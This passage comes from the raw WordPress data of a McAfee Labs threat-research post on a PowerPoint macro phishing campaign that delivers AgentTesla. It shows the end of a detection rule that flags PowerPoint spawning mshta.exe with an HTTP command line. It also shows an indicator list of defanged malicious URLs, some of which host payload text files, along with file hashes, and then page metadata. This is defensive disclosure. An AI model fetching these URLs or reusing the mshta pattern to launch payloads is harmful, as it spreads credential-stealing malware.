data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0\u00a0\u00a0 Include OBJECT_NAME\u00a0{ -v &#8220;powerpnt.exe&#8221; }<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0 }<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0 Target {<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0\u00a0\u00a0 Match PROCESS {<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Include OBJECT_NAME\u00a0{ -v &#8220;mshta.exe&#8221; }<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Include PROCESS_CMD_LINE\u00a0{ -v &#8220;**http**&#8221; }<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Include -access &#8220;CREATE&#8221;<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0\u00a0\u00a0 }<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0 }<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">}<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">IOCs<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">URLs:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"none\">hxxps:\/\/www.bitly.com\/asdhodwkodwkidwowdiahsidh<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"none\">hxxp:\/\/<\/span><\/i><i><span data-contrast=\"none\">\u00a0<\/span><\/i><a href=\"mailto:\/\/1230948%1230948@0v2x.blogspot.com\/p\/27.html\"><i><span data-contrast=\"none\">\/\/1230948%1230948@0v2x.blogspot.com\/p\/27.html<\/span><\/i><\/a><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"none\">hxxps:\/\/p8hj[.]blogspot[.]com\/p\/27.html<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"none\">hxxps:\/\/ia801403.us.archive.org\/23\/items\/150-Re-Crypted-25-June\/27-1.txt\u00a0<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"none\">hxxps:\/\/ia801403.us.archive.org\/23\/items\/150-Re-Crypted-25-June\/27-2.txt\u00a0<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"none\">hxxps:\/\/ia801403.us.archive.org\/23\/items\/150-Re-Crypted-25-June\/27-3.txt<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">EML files:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">72e910652ad2eb992c955382d8ad61020c0e527b1595619f9c48bf66cc7d15d3<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">0afd443dedda44cdd7bd4b91341bd87ab1be8d3911d0f1554f45bd7935d3a8d0<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">fd887fc4787178a97b39753896c556fff9291b6d8c859cdd75027d3611292253<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">38188d5876e17ea620bbc9a30a24a533515c8c2ea44de23261558bb4cad0f8cb <\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">PPAM files:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">6c45bd6b729d85565948d4f4deb87c8668dcf2b26e3d995ebc1dae1c237b67c3<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">9df84ffcf27d5dea1c5178d03a2aa9c3fb829351e56aab9a062f03dbf23ed19b<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">ad9eeff86d7e596168d86e3189d87e63bbb8f56c85bc9d685f154100056593bd<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">c22313f7e12791be0e5f62e40724ed0d75352ada3227c4ae03a62d6d4a0efe2d<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">Extracted\u00a0AgentTesla\u00a0files:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">71b878adf78da89dd9aa5a14592a5e5da50fcbfbc646f1131800d02f8d2d3e99<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">90674a2a4c31a65afc7dc986bae5da45342e2d6a20159c01587a8e0494c87371<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored by Anuradha M McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint&#8230;.<\/p>\n","protected":false},"author":695,"featured_media":129481,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-129442","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Malicious PowerPoint Documents on the Rise | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Anuradha M McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Malicious PowerPoint Documents on the Rise | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Anuradha M McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-22T01:47:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-06-03T02:31:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Malicious PowerPoint Documents on the Rise\",\"datePublished\":\"2021-09-22T01:47:42+00:00\",\"dateModified\":\"2025-06-03T02:31:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/\"},\"wordCount\":1129,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/\",\"name\":\"Malicious PowerPoint Documents on the Rise | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg\",\"datePublished\":\"2021-09-22T01:47:42+00:00\",\"dateModified\":\"2025-06-03T02:31:21+00:00\",\"description\":\"Authored by Anuradha M McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Malicious PowerPoint Documents on the Rise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Malicious PowerPoint Documents on the Rise | McAfee Blog","description":"Authored by Anuradha M McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Malicious PowerPoint Documents on the Rise | McAfee Blog","og_description":"Authored by Anuradha M McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2021-09-22T01:47:42+00:00","article_modified_time":"2025-06-03T02:31:21+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg","type":"image\/jpeg"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Malicious PowerPoint Documents on the Rise","datePublished":"2021-09-22T01:47:42+00:00","dateModified":"2025-06-03T02:31:21+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/"},"wordCount":1129,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/","name":"Malicious PowerPoint Documents on the Rise | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg","datePublished":"2021-09-22T01:47:42+00:00","dateModified":"2025-06-03T02:31:21+00:00","description":"Authored by Anuradha M McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/09\/300x200_powerpoint.jpg","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Malicious PowerPoint Documents on the Rise"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/129442","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=129442"}],"version-history":[{"count":4,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/129442\/revisions"}],"predecessor-version":[{"id":214934,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/129442\/revisions\/214934"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/129481"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=129442"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=129442"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=129442"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=129442"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}